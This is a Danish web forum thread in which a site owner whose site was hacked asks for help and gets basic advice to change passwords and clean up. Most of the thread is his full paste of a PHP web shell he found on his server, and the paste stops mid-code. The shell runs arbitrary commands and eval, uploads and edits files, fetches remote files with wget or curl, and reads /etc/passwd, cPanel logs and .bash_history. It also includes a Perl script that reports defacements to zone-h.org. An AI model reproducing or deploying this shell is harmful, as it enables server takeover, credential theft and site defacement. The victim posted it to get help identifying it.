Avatar billede poulvp Praktikant
15. august 2009 - 09:44 Der er 5 kommentarer og
2 løsninger

Min hjemmeside er blevet hacked ..hvad gør jeg

Min hjemmeside grapo.dk er blevet hacked i nat Jeg kan se følgende i min statestik:

Der ligger nu link på arabiske hjemmesider med min adgangskode og password her:
http://arabic-m.org/onhold-1.html
http://hackteach.org/cc/showthread.php?t=722

ip adressen jeg kan se besøgte min hjemmeside fra Saudi Arabien fandt jeg her "whois ip": 212.116.219.100 - Geo Information
IP Address 212.116.219.100
Host 212.116.219.100
Location  SA, Saudi Arabia
City Riyadh, 10 -
Organization AL Faisaliah Internet Services & Technology
ISP AL Faisaliah Internet Services & Technology
AS Number AS25233 Autonomus System number for Awalnet
Latitude 24°64'08" North
Longitude 46°77'28" East
Distance 2936.82 km (1824.86 miles)

Nogen ideer til hvad man gør?
Avatar billede johnnydamtoft Nybegynder
15. august 2009 - 09:56 #1
Du sætter dig til maskinen og begynder at arbejde. :)

1. Skifter username/password.
2. Ryder op.
3. Uploader dine data igen (hvis nødvendigt).

Hvis du har en virtuel eller dedikeret server, skal du nok overveje at checke mere end blot username/password, og måske enda lave reinstall hvis der nu skulle gemme sig noget syg kode et eller andet sted.

Hvis hackerne har været helt ind på serveren på en af mine maskiner med administrator rettigheder, vil jeg uden tvivl lave reinstall/restore.

Du kan kun tage dette som en oplevelse, og komme videre.
Avatar billede poulvp Praktikant
15. august 2009 - 10:04 #2
Jeg har hostet min hjemmeside hos wannafind og har ændret mit password men det er vel kun en stakket frist.
Indtil videre har jeg lagt lidt oplysninger ud på forsiden under hackerens kommentar her: www.grapo.dk ...må man det?
Avatar billede johnnydamtoft Nybegynder
15. august 2009 - 10:10 #3
Det må du gerne, men hvad vil du opnå med det?

- Du opfordre dem til at komme tilbage, da de sikkert vil tage dette som en udfordring.

Min mening: Glem kampen, da den er tabt på forhånd. Skift også username og lav password med !#¤()1234567890 samt store og små bogstaver. Så har du gjort hvad du kunne.
Avatar billede poulvp Praktikant
15. august 2009 - 10:49 #4
Denne kode ligger i en mappe på min side nu hvad er det?:
<?
/*###########################################

Bk-code shell coded by black-code
Lezr.com teamwork :: A-S-T
Arab hackers
Plz don't change in the code except if u know about php programming
If u see any error or u want to add some changes plz contact me at : Black-Cod3@hotmail.com

Greetz to :  shereba,Rodehedor,Qptan,crash_over_ride,sweet-devil,Ag-spider,mr.hcr,dr-hacker,killer-xxx,simo64,,sniper_sa, Le copra, Red skull,Storm,linuxer,Most3mer,bander_83,kabara and all my friends ..
###########################################*/
error_reporting(0);
set_magic_quotes_runtime(0);

if(version_compare(phpversion(), '4.1.0') == -1)
{$_POST  = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
else{return $requ."?".$link."=".$val;}}
function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid olive' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=olive>$delmtxt</td></tr></table></center>";}
function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
$nscmd=htmlspecialchars($scmd);print $nscmd;}
elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
print htmlspecialchars($pret);}}
function input($type,$name,$value,$size)
{if (empty($value)){print "<input type=$type name=$name size=$size>";}
elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
else {print "<input type=$type name=$name value=$value size=$size >";}}
function permcol($path){if (is_writable($path)){print "<font color=olive>";
callperms($path); print "</font>";}
elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
callperms($path); print "</font>";}
else {print "<font color=white>";callperms($path);}}
if ($dlink=="dwld"){download($_REQUEST['dwld']);}
function download($dwfile) {$size = filesize($dwfile);
@header("Content-Type: application/force-download;name=$dwfile");
@header("Content-Transfer-Encoding: binary");
@header("Content-Length: $size");
@header("Content-Disposition: attachment; filename=$dwfile");
@header("Expires: 0");
@header("Cache-Control: no-cache, must-revalidate");
@header("Pragma: no-cache");
@readfile($dwfile); exit;}
?>
<html>
<head><title>Bk-Code shell</title></head>
<style>
BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; }
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:olive}
input{FONT-WEIGHT:normal;background-color: #191919;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
div{font-size:12px;font-family:tahoma;font-weight:normal;color:whitesmoke}
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=black text=white><font face="sans ms" size=3>
</body>
</html>
<?
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();

$sf="<form method=post>";$ef="</form>";
$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
$sfnt="<font face=tahoma size=2 color=olive>";$efnt="</font>";
################# Ending of common variables ########################

print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=white size=4>[ BK-Code Shell v1.0 ]::[ Coded by Black-Code ]::[ A-S-T : Lezr.com ]
</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
print " - <a href='java script:history.back()'>Back</a>";
print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
if ($dlink=='phpinfo'){print phpinfo();die();}
print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Check perms</a>";
print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
print "<p>Result is : $sfnt".$cbase."$efnt";  die();}
if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
print $sf;input ("text","ncbase",$ncbase,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".$urldc."$efnt";  die();}if ($dlink=='urld'){
print "<p><b>[ Url - Decoder ]</b>";  print $sf;
input ("text","nurld",$nurld,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen'])));  print "<p>Result is : $sfnt".$urlenc."$efnt";  die();}
if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";
print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".$mdfe."$efnt";  die();}if ($dlink=='mdf'){
print "<p><b>[ MD5 - Encoder ]</b>";
print $sf;input ("text","nmdf",$nmdf,35);print " ";
input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
print "<pre>";print "<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
}elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
}print "</textarea>";print "</pre>";die();}
function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
elseif(isset($showsc)&&filesize($showsc) !=="0") {
print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
input ("text","showsc","",35);print " ";
input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
if ($dlink=='cmdhlp'){
print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
input ("text","hlp","",35);print " ";
input ("submit","","Help","");print $ef; die();}
if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
{if (touch ($_REQUEST['indx'])==true){
$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='java script:history.back()'>Edit again</a>
] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
Your index contents here</textarea></p>";
input ("text","indx","Index-name",35);print " ";
input ("submit","qindsub","Create","");print $ef;die();}
if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
input ("submit","mailsub","Send-mail","");print $ef;die();}
if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
function callzone($nscdir){
if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
fwrite ($fpz,"\$arq = @ARGV[0];
\$grupo = @ARGV[1];
chomp \$grupo;
open(a,\"<\$arq\");
@site = <a>;
close(a);
\$b = scalar(@site);
for(\$a=0;\$a<=\$b;\$a++)
{chomp \$site[\$a];
if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
print \"
  • Sending \$site[\$a]\n\";
use IO::Socket::INET;
\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
print \$sock \"Accept-Language: pt-br\r\n\";
print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";
print \$sock \"Content-Length: 385\r\n\";
print \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
close(\$sock);}");
if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "[ Can't complete the operation !! ]";}
else {callfuncs("chmod 777 $zpl;chmod 777 $li");
ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
www.site1.com
www.site2.com
</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
input ("submit","zonesub","Send","");print $ef;die();}
print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
function inisaf($iniv) { $chkini=ini_get($iniv);
if(($chkini || strtolower($chkini)) !=='on'){print"<font color=olive><b>OFF ( Not secured )</b></font>";} else{
print"<font color=red><b>ON ( Secured )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
if ($chkin==""){print " <font color=red><b>None</b></font>";}
else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=olive>".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
while (!feof($opop)){ $nval= fgetc($opop);}}
elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
else{print"<font color=olive><b>OFF</b></font>";} }
print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<tr><td>"; print"<center><br>";
print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
print "<div align=center>"; print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');
print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
callocmd('which GET','/usr/bin/GET');
print"</td>"; print"<td>";print"<br><b>Wget : </b>";
callocmd('which wget','/usr/bin/wget');
print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
callocmd('which lynx','/usr/bin/lynx');
print"</td>"; print "</tr></table>"; }print "<hr><br>";
print "<b>Ur IP : ".$REMOTE_ADDR."<br></b>";
print "<b>Server IP : ".$SERVER_ADDR."</b>";
print"<br><b>".$SERVER_SIGNATURE."</b>";
print "<b>Server Name : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
print "<b>Disable functions : </b>";inifunc(disable_functions);print"<br>";
print "<b>Id : <b>"; callfuncs('id');print"<br><b>Os : </b>";
if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print php_uname(); print "/";print PHP_OS;}
else {callfuncs('uname -a');}}print"<br>";
print"Php-version : ".phpversion(); print"<br><b>Current-path : </b>";
print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
print"<br>";print "Home-path : " .__file__;
print"<br> Total-space: "; readable_size(disk_total_space($nscdir));print " / ";
print"Free-space: "; readable_size(disk_free_space($nscdir));
print "</center><br></font>"; print"</td></tr></table><br>";
if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
else{$mess="Create/Delete Dir";}}elseif (isset($_REQUEST['deldir']))
{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
else{$mess="Create/Delete Dir";}if(isset($_REQUEST['crefile'])){
$ncfile=trim($_REQUEST['cfile']);
if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
else{ $mess3= "Create/Delete file";}}
elseif(isset($_REQUEST['delfile'])){
$ndfile=trim($_REQUEST['cfile']);
if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
else {$mess3= "Create/Delete file";}}
else {$mess3="Create/Delete file";}
class upload{ function upload($file,$tmp){
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
if (@copy($tmp,$nscdir."/".$file)){
print "<div><center><b>:<font color=olive> $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
$ustname=trim ($_REQUEST['ustname']);ob_start();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
!isset($_REQUEST['rfiletxt'])){
if ($dh  = dir($nscdir)){ while (true == ($filename =$dh->read())){
$files[] = $filename; sort($files);}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid black\">";
print "<center><b>Files";print "</td>";
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>File size";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Write";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Read";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Type";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Edit";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Rename";print "</td>";
print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Dwload";print "</td>";if(strstr(PHP_OS,"Linux")){
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Owner/Group";print "</td>";}
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Perms";print "</td></tr>"; foreach ($files as $nfiles){
if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
if (is_writable("$nscdir/$nfiles")){
$scmess2= "<center><font color=olive>Yes";}else {$scmess2="<center><font color=red>No";}if (is_readable("$nscdir/$nfiles")){
$scmess3= "<center><font color=olive>Yes";}else {$scmess3= "<center><font color=red>No";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>DIR";}else{$scmess4= "<center><font color=olive>File";}
print"<tr><td style=\"border:1px solid black\">";
if (is_dir($nfiles)){print "<font face= tahoma size=2 color=olive>[ $nfiles    ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
print"</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 color=#dadada>";
if (is_dir("$nscdir/$nfiles")){print "<b>D</b>irectory";}
elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
print "</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
print"<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Edit</a>";}else {print "<center><font face=tahoma size=2 color=gray>Edit</center>";}print"</td>";  print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Rename</a>";print"</td>";print "<td style=\"border:1px solid black\">";
if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>Dwload</a>";}else {print "<center><font face=tahoma size=2 color=gray>Dwload</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
print "<td style=\"border:1px solid black\">";
print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
print "</center>";print"</td>";}
print "<td style=\"border:1px solid black\">";print "<center><div>";
permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
print "<pre><center>".$sta;
if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
elseif(isset($_REQUEST['eval'])){
ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
elseif (isset($_REQUEST['subqcmnds'])){
if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
}print $eta."</center></pre>";}
function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
if(is_readable($rfile)&&is_file($rfile)){
$fp=fopen ($rfile,"r");print"<center>";
print "<div><b>[ Editing <font color=olive>".basename($rfile)."</font> ] [<a href='java script:history.back()'> Back </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
print $sf."<textarea cols=157 rows=23 name=rfiletxt>";
while (!feof($fp)){$lines = fgetc($fp);
$nlines=htmlspecialchars($lines);print $nlines;}
fclose($fp);print "</textarea>";if (is_writable($rfile)){
print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else
{print "<div><b><center>[ Can't edit <font color=olive>".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
fwrite ($rffp,$rfiletxt);print "<div><b><center>
[ <font color=olive>".basename($hidrfile)."</font> Saved !! ]
[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='java script:history.back()'> Edit again </a>]
</center></b></div><br>";fclose($rffp);}
else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='java script:history.back()'> Back </a>]</center></b></div><br>";}}
if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
function callperms($chkperms){
$perms = fileperms($chkperms);

if (($perms & 0xC000) == 0xC000) {
  // Socket
  $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
  // Symbolic Link
  $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
  // Regular
  $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
  // Block special
  $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
  // Directory
  $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
  // Character special
  $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
  // FIFO pipe
  $info = 'p';
} else {
  // Unknown
  $info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
          (($perms & 0x0800) ? 's' : 'x' ) :
          (($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
          (($perms & 0x0400) ? 's' : 'x' ) :
          (($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
          (($perms & 0x0200) ? 't' : 'x' ) :
          (($perms & 0x0200) ? 'T' : '-'));    print $info;}

          function readable_size($size) {

if ($size < 1024) {
print $size . ' B';
}else {$units = array("kB", "MB", "GB", "TB");
foreach ($units as $unit) {
$size = ($size / 1024);
if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Back </a>]</div>";
